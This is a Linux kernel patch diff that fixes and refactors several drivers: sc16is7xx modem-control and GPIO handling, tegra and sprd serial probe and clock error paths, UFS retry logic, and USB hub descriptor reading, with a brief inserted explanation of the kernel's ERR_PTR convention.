+@@ -236,7 +236,8 @@
+ 
+ /* IOControl register bits (Only 750/760) */
+ #define SC16IS7XX_IOCONTROL_LATCH_BIT	(1 << 0) /* Enable input latching */
+-#define SC16IS7XX_IOCONTROL_MODEM_BIT	(1 << 1) /* Enable GPIO[7:4] as modem pins */
++#define SC16IS7XX_IOCONTROL_MODEM_A_BIT	(1 << 1) /* Enable GPIO[7:4] as modem A pins */
++#define SC16IS7XX_IOCONTROL_MODEM_B_BIT	(1 << 2) /* Enable GPIO[3:0] as modem B pins */
+ #define SC16IS7XX_IOCONTROL_SRESET_BIT	(1 << 3) /* Software Reset */
+ 
+ /* EFCR register bits */
+@@ -301,12 +302,12 @@
+ /* Misc definitions */
+ #define SC16IS7XX_FIFO_SIZE		(64)
+ #define SC16IS7XX_REG_SHIFT		2
++#define SC16IS7XX_GPIOS_PER_BANK	4
+ 
+ struct sc16is7xx_devtype {
+ 	char	name[10];
+ 	int	nr_gpio;
+ 	int	nr_uart;
+-	int	has_mctrl;
+ };
+ 
+ #define SC16IS7XX_RECONF_MD		(1 << 0)
+@@ -336,7 +337,9 @@ struct sc16is7xx_port {
+ 	struct clk			*clk;
+ #ifdef CONFIG_GPIOLIB
+ 	struct gpio_chip		gpio;
++	unsigned long			gpio_valid_mask;
+ #endif
++	u8				mctrl_mask;
+ 	unsigned char			buf[SC16IS7XX_FIFO_SIZE];
+ 	struct kthread_worker		kworker;
+ 	struct task_struct		*kworker_task;
+@@ -447,35 +450,30 @@ static const struct sc16is7xx_devtype sc16is74x_devtype = {
+ 	.name		= "SC16IS74X",
+ 	.nr_gpio	= 0,
+ 	.nr_uart	= 1,
+-	.has_mctrl	= 0,
+ };
+ 
+ static const struct sc16is7xx_devtype sc16is750_devtype = {
+ 	.name		= "SC16IS750",
+-	.nr_gpio	= 4,
++	.nr_gpio	= 8,
+ 	.nr_uart	= 1,
+-	.has_mctrl	= 1,
+ };
+ 
+ static const struct sc16is7xx_devtype sc16is752_devtype = {
+ 	.name		= "SC16IS752",
+-	.nr_gpio	= 0,
++	.nr_gpio	= 8,
+ 	.nr_uart	= 2,
+-	.has_mctrl	= 1,
+ };
+ 
+ static const struct sc16is7xx_devtype sc16is760_devtype = {
+ 	.name		= "SC16IS760",
+-	.nr_gpio	= 4,
++	.nr_gpio	= 8,
+ 	.nr_uart	= 1,
+-	.has_mctrl	= 1,
+ };
+ 
+ static const struct sc16is7xx_devtype sc16is762_devtype = {
+ 	.name		= "SC16IS762",
+-	.nr_gpio	= 0,
++	.nr_gpio	= 8,
+ 	.nr_uart	= 2,
+-	.has_mctrl	= 1,
+ };
+ 
+ static bool sc16is7xx_regmap_volatile(struct device *dev, unsigned int reg)
+@@ -1360,8 +1358,98 @@ static int sc16is7xx_gpio_direction_output(struct gpio_chip *chip,
+ 
+ 	return 0;
+ }
++
++static int sc16is7xx_gpio_init_valid_mask(struct gpio_chip *chip,
++					  unsigned long *valid_mask,
++					  unsigned int ngpios)
++{
++	struct sc16is7xx_port *s = gpiochip_get_data(chip);
++
++	*valid_mask = s->gpio_valid_mask;
++
++	return 0;
++}
++
++static int sc16is7xx_setup_gpio_chip(struct sc16is7xx_port *s)
++{
++	struct device *dev = s->p[0].port.dev;
++
++	if (!s->devtype->nr_gpio)
++		return 0;
++
++	switch (s->mctrl_mask) {
++	case 0:
++		s->gpio_valid_mask = GENMASK(7, 0);
++		break;
++	case SC16IS7XX_IOCONTROL_MODEM_A_BIT:
++		s->gpio_valid_mask = GENMASK(3, 0);
++		break;
++	case SC16IS7XX_IOCONTROL_MODEM_B_BIT:
++		s->gpio_valid_mask = GENMASK(7, 4);
++		break;
++	default:
++		break;
++	}
++
++	if (s->gpio_valid_mask == 0)
++		return 0;
++
++	s->gpio.owner		 = THIS_MODULE;
++	s->gpio.parent		 = dev;
++	s->gpio.label		 = dev_name(dev);
++	s->gpio.init_valid_mask	 = sc16is7xx_gpio_init_valid_mask;
++	s->gpio.direction_input	 = sc16is7xx_gpio_direction_input;
++	s->gpio.get		 = sc16is7xx_gpio_get;
++	s->gpio.direction_output = sc16is7xx_gpio_direction_output;
++	s->gpio.set		 = sc16is7xx_gpio_set;
++	s->gpio.base		 = -1;
++	s->gpio.ngpio		 = s->devtype->nr_gpio;
++	s->gpio.can_sleep	 = 1;
++
++	return gpiochip_add_data(&s->gpio, s);
++}
+ #endif
+ 
++/*
++ * Configure ports designated to operate as modem control lines.
++ */
++static int sc16is7xx_setup_mctrl_ports(struct sc16is7xx_port *s)
++{
++	int i;
++	int ret;
++	int count;
++	u32 mctrl_port[2];
++	struct device *dev = s->p[0].port.dev;
++
++	count = device_property_count_u32(dev, "nxp,modem-control-line-ports");
++	if (count < 0 || count > ARRAY_SIZE(mctrl_port))
++		return 0;
++
++	ret = device_property_read_u32_array(dev, "nxp,modem-control-line-ports",
++					     mctrl_port, count);
++	if (ret)
++		return ret;
++
++	s->mctrl_mask = 0;
++
++	for (i = 0; i < count; i++) {
++		/* Use GPIO lines as modem control lines */
++		if (mctrl_port[i] == 0)
++			s->mctrl_mask |= SC16IS7XX_IOCONTROL_MODEM_A_BIT;
++		else if (mctrl_port[i] == 1)
++			s->mctrl_mask |= SC16IS7XX_IOCONTROL_MODEM_B_BIT;
++	}
++
++	if (s->mctrl_mask)
++		regmap_update_bits(
++			s->regmap,
++			SC16IS7XX_IOCONTROL_REG << SC16IS7XX_REG_SHIFT,
++			SC16IS7XX_IOCONTROL_MODEM_A_BIT |
++			SC16IS7XX_IOCONTROL_MODEM_B_BIT, s->mctrl_mask);
++
++	return 0;
++}
++
+ static const struct serial_rs485 sc16is7xx_rs485_supported = {
+ 	.flags = SER_RS485_ENABLED | SER_RS485_RTS_AFTER_SEND,
+ 	.delay_rts_before_send = 1,
+@@ -1474,12 +1562,6 @@ static int sc16is7xx_probe(struct device *dev,
+ 				     SC16IS7XX_EFCR_RXDISABLE_BIT |
+ 				     SC16IS7XX_EFCR_TXDISABLE_BIT);
+ 
+-		/* Use GPIO lines as modem status registers */
+-		if (devtype->has_mctrl)
+-			sc16is7xx_port_write(&s->p[i].port,
+-					     SC16IS7XX_IOCONTROL_REG,
+-					     SC16IS7XX_IOCONTROL_MODEM_BIT);
+-
+ 		/* Initialize kthread work structs */
+ 		kthread_init_work(&s->p[i].tx_work, sc16is7xx_tx_proc);
+ 		kthread_init_work(&s->p[i].reg_work, sc16is7xx_reg_proc);
+@@ -1517,23 +1599,14 @@ static int sc16is7xx_probe(struct device *dev,
+ 				s->p[u].irda_mode = true;
+ 	}
+ 
++	ret = sc16is7xx_setup_mctrl_ports(s);
++	if (ret)
++		goto out_ports;
++
+ #ifdef CONFIG_GPIOLIB
+-	if (devtype->nr_gpio) {
+-		/* Setup GPIO cotroller */
+-		s->gpio.owner		 = THIS_MODULE;
+-		s->gpio.parent		 = dev;
+-		s->gpio.label		 = dev_name(dev);
+-		s->gpio.direction_input	 = sc16is7xx_gpio_direction_input;
+-		s->gpio.get		 = sc16is7xx_gpio_get;
+-		s->gpio.direction_output = sc16is7xx_gpio_direction_output;
+-		s->gpio.set		 = sc16is7xx_gpio_set;
+-		s->gpio.base		 = -1;
+-		s->gpio.ngpio		 = devtype->nr_gpio;
+-		s->gpio.can_sleep	 = 1;
+-		ret = gpiochip_add_data(&s->gpio, s);
+-		if (ret)
+-			goto out_thread;
+-	}
++	ret = sc16is7xx_setup_gpio_chip(s);
++	if (ret)
++		goto out_ports;
+ #endif
+ 
+ 	/*
+@@ -1556,10 +1629,8 @@ static int sc16is7xx_probe(struct device *dev,
+ 		return 0;
+ 
+ #ifdef CONFIG_GPIOLIB
+-	if (devtype->nr_gpio)
++	if (s->gpio_valid_mask)
+ 		gpiochip_remove(&s->gpio);
+-
+-out_thread:
+ #endif
+ 
+ out_ports:
+@@ -1582,7 +1653,7 @@ static void sc16is7xx_remove(struct device *dev)
+ 	int i;
+ 
+ #ifdef CONFIG_GPIOLIB
+-	if (s->devtype->nr_gpio)
++	if (s->gpio_valid_mask)
+ 		gpiochip_remove(&s->gpio);
+ #endif
+ 
+diff --git a/drivers/tty/serial/serial-tegra.c b/drivers/tty/serial/serial-tegra.c
+index c08360212aa20..7aa2b5b67001d 100644
+--- a/drivers/tty/serial/serial-tegra.c
++++ b/drivers/tty/serial/serial-tegra.c
+@@ -999,7 +999,11 @@ static int tegra_uart_hw_init(struct tegra_uart_port *tup)
+ 	tup->ier_shadow = 0;
+ 	tup->current_baud = 0;
+ 
+-	clk_prepare_enable(tup->uart_clk);
++	ret = clk_prepare_enable(tup->uart_clk);
++	if (ret) {
++		dev_err(tup->uport.dev, "could not enable clk\n");
++		return ret;
++	}
+ 
+ 	/* Reset the UART controller to clear all previous status.*/
+ 	reset_control_assert(tup->rst);
+diff --git a/drivers/tty/serial/sprd_serial.c b/drivers/tty/serial/sprd_serial.c
+index 342a879676315..9c7f71993e945 100644
+--- a/drivers/tty/serial/sprd_serial.c
++++ b/drivers/tty/serial/sprd_serial.c
+@@ -367,7 +367,7 @@ static void sprd_rx_free_buf(struct sprd_uart_port *sp)
+ 	if (sp->rx_dma.virt)
+ 		dma_free_coherent(sp->port.dev, SPRD_UART_RX_SIZE,
+ 				  sp->rx_dma.virt, sp->rx_dma.phys_addr);
+-
++	sp->rx_dma.virt = NULL;
+ }
+ 
+ static int sprd_rx_dma_config(struct uart_port *port, u32 burst)
+@@ -1132,7 +1132,7 @@ static bool sprd_uart_is_console(struct uart_port *uport)
+ static int sprd_clk_init(struct uart_port *uport)
+ {
+ 	struct clk *clk_uart, *clk_parent;
+-	struct sprd_uart_port *u = sprd_port[uport->line];
++	struct sprd_uart_port *u = container_of(uport, struct sprd_uart_port, port);
+ 
+ 	clk_uart = devm_clk_get(uport->dev, "uart");
+ 	if (IS_ERR(clk_uart)) {
+@@ -1175,22 +1175,22 @@ static int sprd_probe(struct platform_device *pdev)
+ {
+ 	struct resource *res;
+ 	struct uart_port *up;
++	struct sprd_uart_port *sport;
+ 	int irq;
+ 	int index;
+ 	int ret;
+ 
+ 	index = of_alias_get_id(pdev->dev.of_node, "serial");
+-	if (index < 0 || index >= ARRAY_SIZE(sprd_port)) {
++	if (index < 0 || index >= UART_NR_MAX) {
+ 		dev_err(&pdev->dev, "got a wrong serial alias id %d\n", index);
+ 		return -EINVAL;
+ 	}
+ 
+-	sprd_port[index] = devm_kzalloc(&pdev->dev, sizeof(*sprd_port[index]),
+-					GFP_KERNEL);
+-	if (!sprd_port[index])
++	sport = devm_kzalloc(&pdev->dev, sizeof(*sport), GFP_KERNEL);
++	if (!sport)
+ 		return -ENOMEM;
+ 
+-	up = &sprd_port[index]->port;
++	up = &sport->port;
+ 	up->dev = &pdev->dev;
+ 	up->line = index;
+ 	up->type = PORT_SPRD;
+@@ -1221,7 +1221,7 @@ static int sprd_probe(struct platform_device *pdev)
+ 	 * Allocate one dma buffer to prepare for receive transfer, in case
+ 	 * memory allocation failure at runtime.
+ 	 */
+-	ret = sprd_rx_alloc_buf(sprd_port[index]);
++	ret = sprd_rx_alloc_buf(sport);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -1229,17 +1229,27 @@ static int sprd_probe(struct platform_device *pdev)
+ 		ret = uart_register_driver(&sprd_uart_driver);
+ 		if (ret < 0) {
+ 			pr_err("Failed to register SPRD-UART driver\n");
+-			return ret;
++			goto free_rx_buf;
+ 		}
+ 	}
++
+ 	sprd_ports_num++;
++	sprd_port[index] = sport;
+ 
+ 	ret = uart_add_one_port(&sprd_uart_driver, up);
+ 	if (ret)
+-		sprd_remove(pdev);
++		goto clean_port;
+ 
+ 	platform_set_drvdata(pdev, up);
+ 
++	return 0;
++
++clean_port:
++	sprd_port[index] = NULL;
++	if (--sprd_ports_num == 0)
++		uart_unregister_driver(&sprd_uart_driver);
++free_rx_buf:
++	sprd_rx_free_buf(sport);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index 977bd4b9dd0b4..36437d39b93c8 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -8830,9 +8830,11 @@ static int ufshcd_set_dev_pwr_mode(struct ufs_hba *hba,
+ 	for (retries = 3; retries > 0; --retries) {
+ 		ret = scsi_execute(sdp, cmd, DMA_NONE, NULL, 0, NULL, &sshdr,
+ 				   HZ, 0, 0, RQF_PM, NULL);
+-		if (!scsi_status_is_check_condition(ret) ||
+-				!scsi_sense_valid(&sshdr) ||
+-				sshdr.sense_key != UNIT_ATTENTION)
++		/*
++		 * scsi_execute() only returns a negative value if the request
++		 * queue is dying.
++		 */
++		if (ret <= 0)
+ 			break;
+ 	}
+ 	if (ret) {
+diff --git a/drivers/usb/core/hcd.c b/drivers/usb/core/hcd.c
+index 8300baedafd20..6af0a31ff1475 100644
+--- a/drivers/usb/core/hcd.c
++++ b/drivers/usb/core/hcd.c
+@@ -983,6 +983,7 @@ static int register_root_hub(struct usb_hcd *hcd)
+ {
+ 	struct device *parent_dev = hcd->self.controller;
+ 	struct usb_device *usb_dev = hcd->self.root_hub;
++	struct usb_device_descriptor *descr;
+ 	const int devnum = 1;
+ 	int retval;
+ 
+@@ -994,13 +995,16 @@ static int register_root_hub(struct usb_hcd *hcd)
+ 	mutex_lock(&usb_bus_idr_lock);
+ 
+ 	usb_dev->ep0.desc.wMaxPacketSize = cpu_to_le16(64);
+-	retval = usb_get_device_descriptor(usb_dev, USB_DT_DEVICE_SIZE);
+-	if (retval != sizeof usb_dev->descriptor) {
++	descr = usb_get_device_descriptor(usb_dev);
++	if (IS_ERR(descr)) {
++		retval = PTR_ERR(descr);
+ 		mutex_unlock(&usb_bus_idr_lock);
+ 		dev_dbg (parent_dev, "can't read %s device descriptor %d\n",
+ 				dev_name(&usb_dev->dev), retval);
+-		return (retval < 0) ? retval : -EMSGSIZE;
++		return retval;
+ 	}
++	usb_dev->descriptor = *descr;
++	kfree(descr);
+ 
+ 	if (le16_to_cpu(usb_dev->descriptor.bcdUSB) >= 0x0201) {
+ 		retval = usb_get_bos_descriptor(usb_dev);
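As the hunk shows, usb_get_device_descriptor() now returns a freshly allocated descriptor or an ERR_PTR() instead of writing into udev->descriptor in place, so callers copy the result and kfree() it. A self-contained sketch of the ERR_PTR/IS_ERR/PTR_ERR convention those callers rely on (demo_get/demo_use are illustrative):

    #include <linux/err.h>
    #include <linux/slab.h>

    static void *demo_get(int fail)
    {
            void *p;

            if (fail)
                    return ERR_PTR(-EIO);   /* errno encoded in the pointer */
            p = kzalloc(16, GFP_KERNEL);
            return p ? p : ERR_PTR(-ENOMEM);
    }

    int demo_use(void)
    {
            void *p = demo_get(0);

            if (IS_ERR(p))
                    return PTR_ERR(p);      /* decode the errno */
            /* ... use the allocation ... */
            kfree(p);
            return 0;
    }
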
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index 1abe43ddb75f0..0069a24bd216c 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -2656,12 +2656,17 @@ int usb_authorize_device(struct usb_device *usb_dev)
+ 	}
+ 
+ 	if (usb_dev->wusb) {
+-		result = usb_get_device_descriptor(usb_dev, sizeof(usb_dev->descriptor));
+-		if (result < 0) {
++		struct usb_device_descriptor *descr;
++
++		descr = usb_get_device_descriptor(usb_dev);
++		if (IS_ERR(descr)) {
++			result = PTR_ERR(descr);
+ 			dev_err(&usb_dev->dev, "can't re-read device descriptor for "
+ 				"authorization: %d\n", result);
+ 			goto error_device_descriptor;
+ 		}
++		usb_dev->descriptor = *descr;
++		kfree(descr);
+ 	}
+ 
+ 	usb_dev->authorized = 1;
+@@ -4661,6 +4666,67 @@ static int hub_enable_device(struct usb_device *udev)
+ 	return hcd->driver->enable_device(hcd, udev);
+ }
+ 
++/*
++ * Get the bMaxPacketSize0 value during initialization by reading the
++ * device's device descriptor.  Since we don't already know this value,
++ * the transfer is unsafe and it ignores I/O errors, only testing for
++ * reasonable received values.
++ *
++ * For "old scheme" initialization, size will be 8 so we read just the
++ * start of the device descriptor, which should work okay regardless of
++ * the actual bMaxPacketSize0 value.  For "new scheme" initialization,
++ * size will be 64 (and buf will point to a sufficiently large buffer),
++ * which might not be kosher according to the USB spec but it's what
++ * Windows does and what many devices expect.
++ *
++ * Returns: bMaxPacketSize0 or a negative error code.
++ */
++static int get_bMaxPacketSize0(struct usb_device *udev,
++		struct usb_device_descriptor *buf, int size, bool first_time)
++{
++	int i, rc;
++
++	/*
++	 * Retry on all errors; some devices are flakey.
++	 * 255 is for WUSB devices, we actually need to use
++	 * 512 (WUSB1.0[4.8.1]).
++	 */
++	for (i = 0; i < GET_MAXPACKET0_TRIES; ++i) {
++		/* Start with invalid values in case the transfer fails */
++		buf->bDescriptorType = buf->bMaxPacketSize0 = 0;
++		rc = usb_control_msg(udev, usb_rcvaddr0pipe(),
++				USB_REQ_GET_DESCRIPTOR, USB_DIR_IN,
++				USB_DT_DEVICE << 8, 0,
++				buf, size,
++				initial_descriptor_timeout);
++		switch (buf->bMaxPacketSize0) {
++		case 8: case 16: case 32: case 64: case 9:
++			if (buf->bDescriptorType == USB_DT_DEVICE) {
++				rc = buf->bMaxPacketSize0;
++				break;
++			}
++			fallthrough;
++		default:
++			if (rc >= 0)
++				rc = -EPROTO;
++			break;
++		}
++
++		/*
++		 * Some devices time out if they are powered on
++		 * when already connected. They need a second
++		 * reset, so return early. But only on the first
++		 * attempt, lest we get into a time-out/reset loop.
++		 */
++		if (rc > 0 || (rc == -ETIMEDOUT && first_time &&
++				udev->speed > USB_SPEED_FULL))
++			break;
++	}
++	return rc;
++}
++
++#define GET_DESCRIPTOR_BUFSIZE	64
++
+ /* Reset device, (re)assign address, get device descriptor.
+  * Device connection must be stable, no more debouncing needed.
+  * Returns device in USB_STATE_ADDRESS, except on error.
+@@ -4670,10 +4736,17 @@ static int hub_enable_device(struct usb_device *udev)
+  * the port lock.  For a newly detected device that is not accessible
+  * through any global pointers, it's not necessary to lock the device,
+  * but it is still necessary to lock the port.
++ *
++ * For a newly detected device, @dev_descr must be NULL.  The device
++ * descriptor retrieved from the device will then be stored in
++ * @udev->descriptor.  For an already existing device, @dev_descr
++ * must be non-NULL.  The device descriptor will be stored there,
++ * not in @udev->descriptor, because descriptors for registered
++ * devices are meant to be immutable.
+  */
+ static int
+ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+-		int retry_counter)
++		int retry_counter, struct usb_device_descriptor *dev_descr)
+ {
+ 	struct usb_device	*hdev = hub->hdev;
+ 	struct usb_hcd		*hcd = bus_to_hcd(hdev->bus);
+@@ -4685,6 +4758,13 @@ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+ 	int			devnum = udev->devnum;
+ 	const char		*driver_name;
+ 	bool			do_new_scheme;
++	const bool		initial = !dev_descr;
++	int			maxp0;
++	struct usb_device_descriptor	*buf, *descr;
++
++	buf = kmalloc(GET_DESCRIPTOR_BUFSIZE, GFP_NOIO);
++	if (!buf)
++		return -ENOMEM;
+ 
+ 	/* root hub ports have a slightly longer reset period
+ 	 * (from USB 2.0 spec, section 7.1.7.5)
+@@ -4717,32 +4797,34 @@ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+ 	}
+ 	oldspeed = udev->speed;
+ 
+-	/* USB 2.0 section 5.5.3 talks about ep0 maxpacket ...
+-	 * it's fixed size except for full speed devices.
+-	 * For Wireless USB devices, ep0 max packet is always 512 (tho
+-	 * reported as 0xff in the device descriptor). WUSB1.0[4.8.1].
+-	 */
+-	switch (udev->speed) {
+-	case USB_SPEED_SUPER_PLUS:
+-	case USB_SPEED_SUPER:
+-	case USB_SPEED_WIRELESS:	/* fixed at 512 */
+-		udev->ep0.desc.wMaxPacketSize = cpu_to_le16(512);
+-		break;
+-	case USB_SPEED_HIGH:		/* fixed at 64 */
+-		udev->ep0.desc.wMaxPacketSize = cpu_to_le16(64);
+-		break;
+-	case USB_SPEED_FULL:		/* 8, 16, 32, or 64 */
+-		/* to determine the ep0 maxpacket size, try to read
+-		 * the device descriptor to get bMaxPacketSize0 and
+-		 * then correct our initial guess.
++	if (initial) {
++		/* USB 2.0 section 5.5.3 talks about ep0 maxpacket ...
++		 * it's fixed size except for full speed devices.
++		 * For Wireless USB devices, ep0 max packet is always 512 (tho
++		 * reported as 0xff in the device descriptor). WUSB1.0[4.8.1].
+ 		 */
+-		udev->ep0.desc.wMaxPacketSize = cpu_to_le16(64);
+-		break;
+-	case USB_SPEED_LOW:		/* fixed at 8 */
+-		udev->ep0.desc.wMaxPacketSize = cpu_to_le16(8);
+-		break;
+-	default:
+-		goto fail;
++		switch (udev->speed) {
++		case USB_SPEED_SUPER_PLUS:
++		case USB_SPEED_SUPER:
++		case USB_SPEED_WIRELESS:	/* fixed at 512 */
++			udev->ep0.desc.wMaxPacketSize = cpu_to_le16(512);
++			break;
++		case USB_SPEED_HIGH:		/* fixed at 64 */
++			udev->ep0.desc.wMaxPacketSize = cpu_to_le16(64);
++			break;
++		case USB_SPEED_FULL:		/* 8, 16, 32, or 64 */
++			/* to determine the ep0 maxpacket size, try to read
++			 * the device descriptor to get bMaxPacketSize0 and
++			 * then correct our initial guess.
++			 */
++			udev->ep0.desc.wMaxPacketSize = cpu_to_le16(64);
++			break;
++		case USB_SPEED_LOW:		/* fixed at 8 */
++			udev->ep0.desc.wMaxPacketSize = cpu_to_le16(8);
++			break;
++		default:
++			goto fail;
++		}
+ 	}
+ 
+ 	if (udev->speed == USB_SPEED_WIRELESS)
+@@ -4765,22 +4847,24 @@ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+ 	if (udev->speed < USB_SPEED_SUPER)
+ 		dev_info(&udev->dev,
+ 				"%s %s USB device number %d using %s\n",
+-				(udev->config) ? "reset" : "new", speed,
++				(initial ? "new" : "reset"), speed,
+ 				devnum, driver_name);
+ 
+-	/* Set up TT records, if needed  */
+-	if (hdev->tt) {
+-		udev->tt = hdev->tt;
+-		udev->ttport = hdev->ttport;
+-	} else if (udev->speed != USB_SPEED_HIGH
+-			&& hdev->speed == USB_SPEED_HIGH) {
+-		if (!hub->tt.hub) {
+-			dev_err(&udev->dev, "parent hub has no TT\n");
+-			retval = -EINVAL;
+-			goto fail;
++	if (initial) {
++		/* Set up TT records, if needed  */
++		if (hdev->tt) {
++			udev->tt = hdev->tt;
++			udev->ttport = hdev->ttport;
++		} else if (udev->speed != USB_SPEED_HIGH
++				&& hdev->speed == USB_SPEED_HIGH) {
++			if (!hub->tt.hub) {
++				dev_err(&udev->dev, "parent hub has no TT\n");
++				retval = -EINVAL;
++				goto fail;
++			}
++			udev->tt = &hub->tt;
++			udev->ttport = port1;
+ 		}
+-		udev->tt = &hub->tt;
+-		udev->ttport = port1;
+ 	}
+ 
+ 	/* Why interleave GET_DESCRIPTOR and SET_ADDRESS this way?
+@@ -4799,9 +4883,6 @@ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+ 
+ 	for (retries = 0; retries < GET_DESCRIPTOR_TRIES; (++retries, msleep(100))) {
+ 		if (do_new_scheme) {
+-			struct usb_device_descriptor *buf;
+-			int r = 0;
+-
+ 			retval = hub_enable_device(udev);
+ 			if (retval < 0) {
+ 				dev_err(&udev->dev,
+@@ -4810,52 +4891,14 @@ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+ 				goto fail;
+ 			}
+ 
+-#define GET_DESCRIPTOR_BUFSIZE	64
+-			buf = kmalloc(GET_DESCRIPTOR_BUFSIZE, GFP_NOIO);
+-			if (!buf) {
+-				retval = -ENOMEM;
+-				continue;
+-			}
+-
+-			/* Retry on all errors; some devices are flakey.
+-			 * 255 is for WUSB devices, we actually need to use
+-			 * 512 (WUSB1.0[4.8.1]).
+-			 */
+-			for (operations = 0; operations < GET_MAXPACKET0_TRIES;
+-					++operations) {
+-				buf->bMaxPacketSize0 = 0;
+-				r = usb_control_msg(udev, usb_rcvaddr0pipe(),
+-					USB_REQ_GET_DESCRIPTOR, USB_DIR_IN,
+-					USB_DT_DEVICE << 8, 0,
+-					buf, GET_DESCRIPTOR_BUFSIZE,
+-					initial_descriptor_timeout);
+-				switch (buf->bMaxPacketSize0) {
+-				case 8: case 16: case 32: case 64: case 255:
+-					if (buf->bDescriptorType ==
+-							USB_DT_DEVICE) {
+-						r = 0;
+-						break;
+-					}
+-					fallthrough;
+-				default:
+-					if (r == 0)
+-						r = -EPROTO;
+-					break;
+-				}
+-				/*
+-				 * Some devices time out if they are powered on
+-				 * when already connected. They need a second
+-				 * reset. But only on the first attempt,
+-				 * lest we get into a time out/reset loop
+-				 */
+-				if (r == 0 || (r == -ETIMEDOUT &&
+-						retries == 0 &&
+-						udev->speed > USB_SPEED_FULL))
+-					break;
++			maxp0 = get_bMaxPacketSize0(udev, buf,
++					GET_DESCRIPTOR_BUFSIZE, retries == 0);
++			if (maxp0 > 0 && !initial &&
++					maxp0 != udev->descriptor.bMaxPacketSize0) {
++				dev_err(&udev->dev, "device reset changed ep0 maxpacket size!\n");
++				retval = -ENODEV;
++				goto fail;
+ 			}
+-			udev->descriptor.bMaxPacketSize0 =
+-					buf->bMaxPacketSize0;
+-			kfree(buf);
+ 
+ 			retval = hub_port_reset(hub, port1, udev, delay, false);
+ 			if (retval < 0)		/* error or disconnect */
+@@ -4866,14 +4909,13 @@ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+ 				retval = -ENODEV;
+ 				goto fail;
+ 			}
+-			if (r) {
+-				if (r != -ENODEV)
++			if (maxp0 < 0) {
++				if (maxp0 != -ENODEV)
+ 					dev_err(&udev->dev, "device descriptor read/64, error %d\n",
+-							r);
+-				retval = -EMSGSIZE;
++							maxp0);
++				retval = maxp0;
+ 				continue;
+ 			}
+-#undef GET_DESCRIPTOR_BUFSIZE
+ 		}
+ 
+ 		/*
+@@ -4919,18 +4961,22 @@ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+ 				break;
+ 		}
+ 
+-		retval = usb_get_device_descriptor(udev, 8);
+-		if (retval < 8) {
++		/* !do_new_scheme || wusb */
++		maxp0 = get_bMaxPacketSize0(udev, buf, 8, retries == 0);
++		if (maxp0 < 0) {
++			retval = maxp0;
+ 			if (retval != -ENODEV)
+ 				dev_err(&udev->dev,
+ 					"device descriptor read/8, error %d\n",
+ 					retval);
+-			if (retval >= 0)
+-				retval = -EMSGSIZE;
+ 		} else {
+ 			u32 delay;
+ 
+-			retval = 0;
++			if (!initial && maxp0 != udev->descriptor.bMaxPacketSize0) {
++				dev_err(&udev->dev, "device reset changed ep0 maxpacket size!\n");
++				retval = -ENODEV;
++				goto fail;
++			}
+ 
+ 			delay = udev->parent->hub_delay;
+ 			udev->hub_delay = min_t(u32, delay,
+@@ -4949,48 +4995,61 @@ hub_port_init(struct usb_hub *hub, struct usb_device *udev, int port1,
+ 		goto fail;
+ 
+ 	/*
+-	 * Some superspeed devices have finished the link training process
+-	 * and attached to a superspeed hub port, but the device descriptor
+-	 * got from those devices show they aren't superspeed devices. Warm
+-	 * reset the port attached by the devices can fix them.
++	 * Check the ep0 maxpacket guess and correct it if necessary.
++	 * maxp0 is the value stored in the device descriptor;
++	 * i is the value it encodes (logarithmic for SuperSpeed or greater).
+ 	 */
+-	if ((udev->speed >= USB_SPEED_SUPER) &&
+-			(le16_to_cpu(udev->descriptor.bcdUSB) < 0x0300)) {
+-		dev_err(&udev->dev, "got a wrong device descriptor, "
+-				"warm reset device\n");
+-		hub_port_reset(hub, port1, udev,
+-				HUB_BH_RESET_TIME, true);
+-		retval = -EINVAL;
+-		goto fail;
+-	}
+-
+-	if (udev->descriptor.bMaxPacketSize0 == 0xff ||
+-			udev->speed >= USB_SPEED_SUPER)
+-		i = 512;
+-	else
+-		i = udev->descriptor.bMaxPacketSize0;
+-	if (usb_endpoint_maxp(&udev->ep0.desc) != i) {
+-		if (udev->speed == USB_SPEED_LOW ||
+-				!(i == 8 || i == 16 || i == 32 || i == 64)) {
+-			dev_err(&udev->dev, "Invalid ep0 maxpacket: %d\n", i);
+-			retval = -EMSGSIZE;
+-			goto fail;
+-		}
++	i = maxp0;
++	if (udev->speed >= USB_SPEED_SUPER) {
++		if (maxp0 <= 16)
++			i = 1 << maxp0;
++		else
++			i = 0;		/* Invalid */
++	}
++	if (usb_endpoint_maxp(&udev->ep0.desc) == i) {
++		;	/* Initial ep0 maxpacket guess is right */
++	} else if ((udev->speed == USB_SPEED_FULL ||
++				udev->speed == USB_SPEED_HIGH) &&
++			(i == 8 || i == 16 || i == 32 || i == 64)) {
++		/* Initial guess is wrong; use the descriptor's value */
+ 		if (udev->speed == USB_SPEED_FULL)
+ 			dev_dbg(&udev->dev, "ep0 maxpacket = %d\n", i);
+ 		else
+ 			dev_warn(&udev->dev, "Using ep0 maxpacket: %d\n", i);
+ 		udev->ep0.desc.wMaxPacketSize = cpu_to_le16(i);
+ 		usb_ep0_reinit(udev);
++	} else {
++		/* Initial guess is wrong and descriptor's value is invalid */
++		dev_err(&udev->dev, "Invalid ep0 maxpacket: %d\n", maxp0);
++		retval = -EMSGSIZE;
++		goto fail;
+ 	}
+ 
+-	retval = usb_get_device_descriptor(udev, USB_DT_DEVICE_SIZE);
+-	if (retval < (signed)sizeof(udev->descriptor)) {
++	descr = usb_get_device_descriptor(udev);
++	if (IS_ERR(descr)) {
++		retval = PTR_ERR(descr);
+ 		if (retval != -ENODEV)
+ 			dev_err(&udev->dev, "device descriptor read/all, error %d\n",
+ 					retval);
+-		if (retval >= 0)
+-			retval = -ENOMSG;
++		goto fail;
++	}
++	if (initial)
++		udev->descriptor = *descr;
++	else
++		*dev_descr = *descr;
++	kfree(descr);
++
++	/*
